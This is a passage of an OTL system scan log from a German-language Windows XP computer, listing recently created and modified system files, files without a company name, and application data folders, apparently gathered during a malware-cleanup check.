C:\WINDOWS\System32\dllcache\schannel.dll [2010.06.08 18:57:18 | 000,286,720 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\gdi32.dll [2010.06.08 18:57:06 | 001,372,672 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\msxml6.dll [2010.06.08 18:56:52 | 001,172,480 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\msxml3.dll [2010.06.08 18:56:42 | 000,337,408 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\netapi32.dll [2010.06.08 18:56:28 | 000,253,952 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\es.dll [2010.06.08 18:56:16 | 000,074,240 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\mscms.dll [2010.06.08 18:56:06 | 000,361,600 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\tcpip.sys [2010.06.08 18:56:06 | 000,247,296 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\mswsock.dll [2010.06.08 18:56:06 | 000,226,880 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\tcpip6.sys [2010.06.08 18:56:06 | 000,147,968 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\dnsapi.dll [2010.06.08 18:56:06 | 000,138,496 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\afd.sys [2010.06.08 18:55:49 | 000,273,024 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\bthport.sys [2010.06.08 18:55:06 | 000,177,664 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\wintrust.dll [2010.06.08 18:55:04 | 000,086,528 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\cabview.dll [2010.06.08 18:52:06 | 000,015,584 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\wuapi.dll.mui [2010.06.08 18:50:18 | 000,159,744 | ---- | C] (Intel Corporation) -- C:\WINDOWS\System32\igfxres.dll [2010.06.08 18:32:54 | 000,000,000 | ---D | C] -- C:\WINDOWS\Prefetch [2010.06.08 17:06:54 | 001,071,088 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\mscomctl.ocx [2010.06.08 17:06:54 | 001,066,176 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\mscomctl32.ocx [2010.06.08 17:06:54 | 000,275,216 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\msdatgrd.ocx [2010.06.08 17:06:54 | 000,260,880 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\msflxgrd.ocx [2010.06.08 17:06:54 | 000,232,640 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\msdatlst.ocx [2010.06.08 17:06:54 | 000,224,016 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\tabctl32.ocx [2010.06.08 17:06:54 | 000,212,240 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\richtx32.ocx [2010.06.08 17:06:54 | 000,166,600 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\msmask32.ocx [2010.06.08 17:06:54 | 000,132,880 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\msinet.ocx [2010.06.08 17:06:54 | 000,124,688 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\mswinsck.ocx [2010.06.08 17:06:54 | 000,103,744 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\mscomm32.ocx [2010.06.08 17:06:54 | 000,083,144 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\picclp32.ocx [2010.06.08 17:06:54 | 000,067,376 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\sysinfo.ocx [2010.06.08 17:06:53 | 002,887,680 | ---- | C] (Intel Corporation) -- C:\WINDOWS\System32\dllcache\libmmd.dll [2010.06.08 17:06:53 | 001,872,666 | ---- | C] (Red Hat) -- C:\WINDOWS\System32\dllcache\cygwin1.dll [2010.06.08 17:06:53 | 001,351,392 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\comctl32.ocx [2010.06.08 17:06:53 | 001,060,864 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\mfc71.dll [2010.06.08 17:06:53 | 001,053,184 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\mfc71u.dll [2010.06.08 17:06:53 | 001,024,000 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\mfc70.dll [2010.06.08 17:06:53 | 001,017,344 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\mfc70u.dll [2010.06.08 17:06:53 | 001,015,808 | ---- | C] (The OpenSSL Project, hxxp://www.openssl.org/) -- C:\WINDOWS\System32\dllcache\libeay32.dll [2010.06.08 17:06:53 | 000,898,048 | ---- | C] (GNU <www.gnu.org>) -- C:\WINDOWS\System32\dllcache\libiconv2.dll [2010.06.08 17:06:53 | 000,722,192 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\vb40032.dll [2010.06.08 17:06:53 | 000,662,288 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\mscomct2.ocx [2010.06.08 17:06:53 | 000,503,808 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\msvcp71.dll [2010.06.08 17:06:53 | 000,487,424 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\msvcp70.dll [2010.06.08 17:06:53 | 000,416,528 | ---- | C] (Microsoft Corporation ) -- C:\WINDOWS\System32\dllcache\comct332.ocx [2010.06.08 17:06:53 | 000,413,696 | ---- | C] (Creative Labs) -- C:\WINDOWS\System32\dllcache\wrap_oal.dll [2010.06.08 17:06:53 | 000,406,016 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\usp10.dll [2010.06.08 17:06:53 | 000,344,064 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\msvcr71.dll [2010.06.08 17:06:53 | 000,339,968 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\msvcr70.dll [2010.06.08 17:06:53 | 000,294,920 | ---- | C] (AutoIt Team) -- C:\WINDOWS\System32\dllcache\autoitx3.dll [2010.06.08 17:06:53 | 000,200,496 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\dblist32.ocx [2010.06.08 17:06:53 | 000,198,848 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\mci32.ocx [2010.06.08 17:06:53 | 000,196,608 | ---- | C] (The OpenSSL Project, hxxp://www.openssl.org/) -- C:\WINDOWS\System32\dllcache\ssleay32.dll [2010.06.08 17:06:53 | 000,196,608 | ---- | C] (The OpenSSL Project, hxxp://www.openssl.org/) -- C:\WINDOWS\System32\dllcache\libssl32.dll [2010.06.08 17:06:53 | 000,164,144 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\comct232.ocx [2010.06.08 17:06:53 | 000,152,848 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\comdlg32.ocx [2010.06.08 17:06:53 | 000,119,808 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\msstdfmt.dll [2010.06.08 17:06:53 | 000,101,888 | ---- | C] (GNU <www.gnu.org>) -- C:\WINDOWS\System32\dllcache\libintl3.dll [2010.06.08 17:06:53 | 000,094,208 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\msstkprp.dll [2010.06.08 17:06:53 | 000,089,600 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\atl71.dll [2010.06.08 17:06:53 | 000,086,016 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\atl70.dll [2010.06.08 17:06:53 | 000,054,784 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\msvci70.dll [2010.06.08 17:06:53 | 000,021,504 | ---- | C] (NVIDIA Corporation) -- C:\WINDOWS\System32\dllcache\openal32.dll [2010.06.08 17:03:05 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\dllcache [2010.06.08 16:57:04 | 000,000,000 | ---D | C] -- C:\Programme\ComPlus Applications [2010.06.08 16:38:34 | 000,013,824 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\irclass.dll [2010.06.08 16:38:33 | 000,024,661 | ---- | C] (Perle Systems Ltd.) -- C:\WINDOWS\System32\spxcoins.dll [2010.05.28 13:04:52 | 000,014,896 | ---- | C] (Secunia) -- C:\WINDOWS\System32\drivers\psi_mf.sys [2010.05.21 01:14:36 | 000,000,000 | ---D | C] -- C:\Programme\satmap_v2.3.7 [2010.05.15 19:25:18 | 000,000,000 | ---D | C] -- C:\Dokumente und Einstellungen\***\Eigene Dateien\tom [3 C:\WINDOWS\System32\*.tmp files -> C:\WINDOWS\System32\*.tmp -> ] ========== Files - Modified Within 60 Days ========== [2010.07.03 17:16:35 | 000,574,464 | ---- | M] (OldTimer Tools) -- C:\Dokumente und Einstellungen\***\Desktop\OTL.exe [2010.07.03 11:47:50 | 000,000,572 | ---- | M] () -- C:\Dokumente und Einstellungen\All Users\Desktop\Opera.lnk [2010.07.03 11:40:28 | 008,126,464 | -H-- | M] () -- C:\Dokumente und Einstellungen\***\NTUSER.DAT [2010.07.03 10:06:22 | 000,001,374 | ---- | M] () -- C:\WINDOWS\System32\wpa.dbl [2010.07.03 10:06:07 | 000,000,006 | -H-- | M] () -- C:\WINDOWS\tasks\SA.DAT [2010.07.03 10:06:04 | 000,002,048 | --S- | M] () -- C:\WINDOWS\bootstat.dat [2010.07.03 03:05:50 | 000,000,190 | -HS- | M] () -- C:\Dokumente und Einstellungen\***\ntuser.ini [2010.07.02 21:31:28 | 000,000,069 | ---- | M] () -- C:\WINDOWS\NeroDigital.ini [2010.07.01 21:43:32 | 170,106,880 | ---- | M] () -- C:\Dokumente und Einstellungen\***\Eigene Dateien\winpe.iso [2010.07.01 07:58:34 | 002,979,350 | ---- | M] () -- C:\Dokumente und Einstellungen\***\Eigene Dateien\ESET_EAV4_User_Guide_DEU.pdf [2010.06.30 14:34:49 | 006,135,225 | ---- | M] () -- C:\Dokumente und Einstellungen\***\Eigene Dateien\FTool_User_Guide_215.pdf [2010.06.28 23:13:58 | 000,000,227 | ---- | M] () -- C:\WINDOWS\system.ini [2010.06.28 13:40:57 | 000,000,700 | ---- | M] () -- C:\Dokumente und Einstellungen\***\Startmenü\Programme\Autostart\Secunia PSI.lnk [2010.06.28 10:25:20 | 000,000,065 | ---- | M] () -- C:\WINDOWS\control.ini [2010.06.28 02:22:32 | 000,232,960 | ---- | M] () -- C:\Dokumente und Einstellungen\***\Lokale Einstellungen\Anwendungsdaten\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini [2010.06.25 23:58:23 | 000,000,027 | ---- | M] () -- C:\WINDOWS\System32\drivers\etc\hosts [2010.06.25 23:47:47 | 000,000,281 | -HS- | M] () -- C:\boot.ini [2010.06.25 15:37:54 | 000,002,437 | ---- | M] () -- C:\Dokumente und Einstellungen\***\Desktop\HiJackThis.lnk [2010.06.24 03:20:16 | 001,025,340 | ---- | M] () -- C:\WINDOWS\System32\PerfStringBackup.INI [2010.06.24 03:20:16 | 000,459,050 | ---- | M] () -- C:\WINDOWS\System32\perfh007.dat [2010.06.24 03:20:16 | 000,441,018 | ---- | M] () -- C:\WINDOWS\System32\perfh009.dat [2010.06.24 03:20:16 | 000,084,908 | ---- | M] () -- C:\WINDOWS\System32\perfc007.dat [2010.06.24 03:20:16 | 000,071,336 | ---- | M] () -- C:\WINDOWS\System32\perfc009.dat [2010.06.21 03:52:51 | 000,002,000 | ---- | M] () -- C:\WINDOWS\Sandboxie.ini [2010.06.20 21:01:19 | 000,000,676 | ---- | M] () -- C:\Dokumente und Einstellungen\All Users\Desktop\Malwarebytes' Anti-Malware.lnk [2010.06.20 20:44:55 | 000,077,312 | ---- | M] () -- C:\mbr.exe [2010.06.12 12:18:32 | 000,099,048 | ---- | M] () -- C:\WINDOWS\System32\FNTCACHE.DAT [2010.06.12 03:37:21 | 000,001,374 | ---- | M] () -- C:\WINDOWS\imsins.BAK [2010.06.11 00:17:06 | 000,000,630 | ---- | M] () -- C:\Dokumente und Einstellungen\***\Desktop\HTTrack Website Copier.lnk [2010.06.08 18:49:40 | 000,001,374 | ---- | M] () -- C:\WINDOWS\System32\wpa.bak [2010.06.08 17:08:39 | 000,000,287 | ---- | M] () -- C:\WINDOWS\System32\$winnt$.inf [2010.06.08 17:04:03 | 000,023,392 | ---- | M] () -- C:\WINDOWS\System32\nscompat.tlb [2010.06.08 17:04:03 | 000,016,832 | ---- | M] () -- C:\WINDOWS\System32\amcompat.tlb [2010.06.08 17:03:18 | 000,004,161 | ---- | M] () -- C:\WINDOWS\ODBCINST.INI [2010.06.08 17:00:47 | 000,000,488 | RH-- | M] () -- C:\WINDOWS\System32\WindowsLogon.manifest [2010.06.08 17:00:47 | 000,000,488 | RH-- | M] () -- C:\WINDOWS\System32\logonui.exe.manifest [2010.06.08 17:00:40 | 000,000,749 | RH-- | M] () -- C:\WINDOWS\System32\wuaucpl.cpl.manifest [2010.06.08 17:00:40 | 000,000,749 | RH-- | M] () -- C:\WINDOWS\WindowsShell.Manifest [2010.06.08 17:00:40 | 000,000,749 | RH-- | M] () -- C:\WINDOWS\System32\sapi.cpl.manifest [2010.06.08 17:00:40 | 000,000,749 | RH-- | M] () -- C:\WINDOWS\System32\nwc.cpl.manifest [2010.06.08 17:00:40 | 000,000,749 | RH-- | M] () -- C:\WINDOWS\System32\ncpa.cpl.manifest [2010.06.08 17:00:40 | 000,000,749 | RH-- | M] () -- C:\WINDOWS\System32\cdplayer.exe.manifest [2010.06.08 17:00:19 | 000,000,639 | ---- | M] () -- C:\WINDOWS\win.ini [2010.06.08 16:57:20 | 000,023,504 | ---- | M] () -- C:\WINDOWS\System32\emptyregdb.dat [2010.06.08 16:54:11 | 000,000,211 | ---- | M] () -- C:\Boot.bak [2010.06.08 14:26:32 | 000,269,947 | ---- | M] () -- C:\WINDOWS\setupapi.old [2010.06.08 14:25:30 | 000,004,444 | ---- | M] () -- C:\WINDOWS\System32\pid.PNF [2010.06.06 17:06:00 | 000,000,579 | ---- | M] () -- C:\Dokumente und Einstellungen\***\Desktop\Touratech QV 4.lnk [2010.05.28 13:04:52 | 000,014,896 | ---- | M] (Secunia) -- C:\WINDOWS\System32\drivers\psi_mf.sys [2010.05.04 18:48:46 | 000,841,216 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\wininet.dll [2010.05.04 18:48:45 | 000,233,472 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\webcheck.dll [2010.05.04 18:48:44 | 001,171,968 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\urlmon.dll [2010.05.04 18:48:43 | 000,671,232 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\mstime.dll [2010.05.04 18:48:43 | 000,671,232 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\mstime.dll [2010.05.04 18:48:43 | 000,105,984 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\url.dll [2010.05.04 18:48:43 | 000,105,984 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\url.dll [2010.05.04 18:48:43 | 000,102,912 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\occache.dll [2010.05.04 18:48:43 | 000,044,544 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\pngfilt.dll [2010.05.04 18:48:43 | 000,044,544 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\pngfilt.dll [2010.05.04 18:48:41 | 000,477,696 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\mshtmled.dll [2010.05.04 18:48:41 | 000,193,024 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\msrating.dll [2010.05.04 18:48:41 | 000,193,024 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\msrating.dll [2010.05.04 18:48:40 | 003,603,456 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\mshtml.dll [2010.05.04 18:48:36 | 000,459,264 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\msfeeds.dll [2010.05.04 18:48:36 | 000,459,264 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\msfeeds.dll [2010.05.04 18:48:36 | 000,052,224 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\msfeedsbs.dll [2010.05.04 18:48:36 | 000,052,224 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\msfeedsbs.dll [2010.05.04 18:48:35 | 001,830,912 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\inetcpl.cpl [2010.05.04 18:48:35 | 001,830,912 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\inetcpl.cpl [2010.05.04 18:48:35 | 000,027,648 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\jsproxy.dll [2010.05.04 18:48:35 | 000,027,648 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\jsproxy.dll [2010.05.04 18:48:33 | 000,268,288 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\iertutil.dll [2010.05.04 18:48:33 | 000,193,024 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\iepeers.dll [2010.05.04 18:48:33 | 000,193,024 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\iepeers.dll [2010.05.04 18:48:33 | 000,044,544 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\iernonce.dll [2010.05.04 18:48:33 | 000,044,544 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\iernonce.dll [2010.05.04 18:48:32 | 006,071,296 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\ieframe.dll [2010.05.04 18:48:29 | 000,078,336 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\ieencode.dll [2010.05.04 18:48:29 | 000,078,336 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\ieencode.dll [2010.05.04 18:48:28 | 000,388,608 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\iedkcs32.dll [2010.05.04 18:48:28 | 000,388,608 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\iedkcs32.dll [2010.05.04 18:48:28 | 000,380,928 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\ieapfltr.dll [2010.05.04 18:48:28 | 000,380,928 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\ieapfltr.dll [2010.05.04 18:48:27 | 000,230,400 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\ieaksie.dll [2010.05.04 18:48:27 | 000,230,400 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\ieaksie.dll [2010.05.04 18:48:27 | 000,153,088 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\ieakeng.dll [2010.05.04 18:48:27 | 000,153,088 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\ieakeng.dll [2010.05.04 18:48:26 | 000,347,136 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\dxtmsft.dll [2010.05.04 18:48:26 | 000,347,136 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\dxtmsft.dll [2010.05.04 18:48:26 | 000,214,528 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\dxtrans.dll [2010.05.04 18:48:26 | 000,214,528 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\dxtrans.dll [2010.05.04 18:48:26 | 000,132,608 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\extmgr.dll [2010.05.04 18:48:26 | 000,063,488 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\icardie.dll [2010.05.04 18:48:25 | 000,124,928 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\advpack.dll [2010.05.04 18:48:25 | 000,017,408 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\corpol.dll [2010.05.04 18:48:25 | 000,017,408 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\corpol.dll [3 C:\WINDOWS\System32\*.tmp files -> C:\WINDOWS\System32\*.tmp -> ] ========== Files Created - No Company Name ========== [2010.07.02 14:55:46 | 006,135,225 | ---- | C] () -- C:\Dokumente und Einstellungen\***\Eigene Dateien\FTool_User_Guide_215.pdf [2010.07.01 23:22:51 | 170,106,880 | ---- | C] () -- C:\Dokumente und Einstellungen\***\Eigene Dateien\winpe.iso [2010.07.01 07:58:33 | 002,979,350 | ---- | C] () -- C:\Dokumente und Einstellungen\***\Eigene Dateien\ESET_EAV4_User_Guide_DEU.pdf [2010.06.28 13:40:57 | 000,000,700 | ---- | C] () -- C:\Dokumente und Einstellungen\***\Startmenü\Programme\Autostart\Secunia PSI.lnk [2010.06.25 23:47:47 | 000,000,211 | ---- | C] () -- C:\Boot.bak [2010.06.25 23:47:42 | 000,262,448 | ---- | C] () -- C:\cmldr [2010.06.25 23:44:12 | 000,256,512 | ---- | C] () -- C:\WINDOWS\PEV.exe [2010.06.25 23:44:12 | 000,098,816 | ---- | C] () -- C:\WINDOWS\sed.exe [2010.06.25 23:44:12 | 000,080,412 | ---- | C] () -- C:\WINDOWS\grep.exe [2010.06.25 23:44:12 | 000,077,312 | ---- | C] () -- C:\WINDOWS\MBR.exe [2010.06.25 23:44:12 | 000,068,096 | ---- | C] () -- C:\WINDOWS\zip.exe [2010.06.20 21:01:19 | 000,000,676 | ---- | C] () -- C:\Dokumente und Einstellungen\All Users\Desktop\Malwarebytes' Anti-Malware.lnk [2010.06.20 20:44:55 | 000,077,312 | ---- | C] () -- C:\mbr.exe [2010.06.18 13:17:31 | 000,002,437 | ---- | C] () -- C:\Dokumente und Einstellungen\***\Desktop\HiJackThis.lnk [2010.06.11 00:17:06 | 000,000,630 | ---- | C] () -- C:\Dokumente und Einstellungen\***\Desktop\HTTrack Website Copier.lnk [2010.06.08 17:06:53 | 000,394,752 | ---- | C] () -- C:\WINDOWS\System32\dllcache\cygwinb19.dll [2010.06.08 17:00:47 | 000,000,488 | RH-- | C] () -- C:\WINDOWS\System32\logonui.exe.manifest [2010.06.08 17:00:40 | 000,000,749 | RH-- | C] () -- C:\WINDOWS\System32\wuaucpl.cpl.manifest [2010.06.08 17:00:40 | 000,000,749 | RH-- | C] () -- C:\WINDOWS\WindowsShell.Manifest [2010.06.08 17:00:40 | 000,000,749 | RH-- | C] () -- C:\WINDOWS\System32\sapi.cpl.manifest [2010.06.08 17:00:40 | 000,000,749 | RH-- | C] () -- C:\WINDOWS\System32\nwc.cpl.manifest [2010.06.08 17:00:40 | 000,000,749 | RH-- | C] () -- C:\WINDOWS\System32\ncpa.cpl.manifest [2010.04.16 03:00:23 | 000,014,848 | ---- | C] () -- C:\WINDOWS\System32\EuEpmGdi.dll [2010.04.16 03:00:22 | 000,013,192 | ---- | C] () -- C:\WINDOWS\System32\epmntdrv.sys [2010.04.16 03:00:22 | 000,008,456 | ---- | C] () -- C:\WINDOWS\System32\EuGdiDrv.sys [2009.12.08 00:41:10 | 000,000,008 | ---- | C] () -- C:\WINDOWS\System32\PROTOCOL.INI [2008.10.31 18:44:22 | 000,000,069 | ---- | C] () -- C:\WINDOWS\NeroDigital.ini [2008.10.24 14:11:34 | 000,000,754 | ---- | C] () -- C:\WINDOWS\WORDPAD.INI [2008.10.20 13:24:14 | 000,088,832 | ---- | C] () -- C:\WINDOWS\System32\drivers\WMDrive.sys [2008.10.10 03:19:34 | 000,002,000 | ---- | C] () -- C:\WINDOWS\Sandboxie.ini [2008.09.12 12:17:56 | 000,340,021 | ---- | C] () -- C:\WINDOWS\System32\jpeg.dll [2008.09.03 22:47:08 | 000,159,839 | ---- | C] () -- C:\WINDOWS\System32\xvidvfw.dll [2008.09.03 22:47:07 | 003,596,288 | ---- | C] () -- C:\WINDOWS\System32\qt-dx331.dll [2008.09.03 22:47:07 | 001,110,016 | ---- | C] () -- C:\WINDOWS\System32\vorbis.dll [2008.09.03 22:47:07 | 000,978,944 | ---- | C] () -- C:\WINDOWS\System32\vorbisenc.dll [2008.09.03 22:47:07 | 000,755,027 | ---- | C] () -- C:\WINDOWS\System32\xvidcore.dll [2008.09.03 22:47:07 | 000,032,768 | ---- | C] () -- C:\WINDOWS\System32\vorbisfile.dll [2008.09.03 22:47:06 | 000,237,568 | ---- | C] () -- C:\WINDOWS\System32\OggDS.dll [2008.09.03 22:47:06 | 000,024,576 | ---- | C] () -- C:\WINDOWS\System32\ogg.dll [2008.08.28 15:12:37 | 000,000,048 | ---- | C] () -- C:\WINDOWS\DMIVIEW.INI [2008.08.27 00:48:21 | 000,059,904 | ---- | C] () -- C:\WINDOWS\System32\zlib1.dll [2008.08.27 00:48:20 | 000,394,752 | ---- | C] () -- C:\WINDOWS\System32\cygwinb19.dll [2008.06.18 10:37:36 | 000,000,182 | ---- | C] () -- C:\WINDOWS\System32\AIO-Auswahl.ini [2008.06.18 10:36:07 | 001,800,192 | ---- | C] () -- C:\WINDOWS\System32\hmtcdres.dll [2008.06.18 10:36:06 | 000,394,240 | ---- | C] () -- C:\WINDOWS\System32\hmtcd.dll ========== LOP Check ========== [2010.06.14 13:51:56 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\ESET [2008.10.18 22:05:12 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\LightScribe [2010.03.18 04:33:58 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\Paragon [2009.10.09 14:44:14 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\PhotoME [2010.01.15 05:01:08 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\TEMP [2008.10.09 01:15:32 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\COMPAREIT [2010.01.17 20:58:13 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\GeoSetter [2010.06.27 03:01:35 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\GlobalMapper [2008.10.09 14:40:29 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\ImgBurn [2009.12.26 01:21:14 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\LizardTech [2009.01.15 20:00:08 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\NewsLeecher [2008.08.28 04:33:46 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\Opera [2008.10.09 01:06:36 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\SteelBytes [2008.11.10 02:04:51 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\WinMount [2010.04.10 19:37:18 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\XnView [2010.01.31 18:40:52 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\Yandex [2010.02.10 05:34:20 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\Zoner ========== Purity Check ========== ========== Custom Scans ========== < %ALLUSERSPROFILE%\Application Data\*. > < %ALLUSERSPROFILE%\Application Data\*.exe /s > < %APPDATA%\*. > [2010.04.01 14:41:19 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\Adobe [2008.10.18 22:05:14 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\Ahead [2008.10.09 01:15:32 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\COMPAREIT [2010.01.17 20:58:13 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\GeoSetter [2010.06.27 03:01:35 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\GlobalMapper [2008.08.28 17:32:39 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\Google [2008.10.04 00:20:30 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\Help [2008.08.27 00:53:38 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\Identities [2008.10.09 14:40:29 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\ImgBurn [2008.08.28 14:24:03 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\InstallShield [2008.08.28 14:10:01 | 000,000,000 | ---D | M] -- C:\Dokumente und 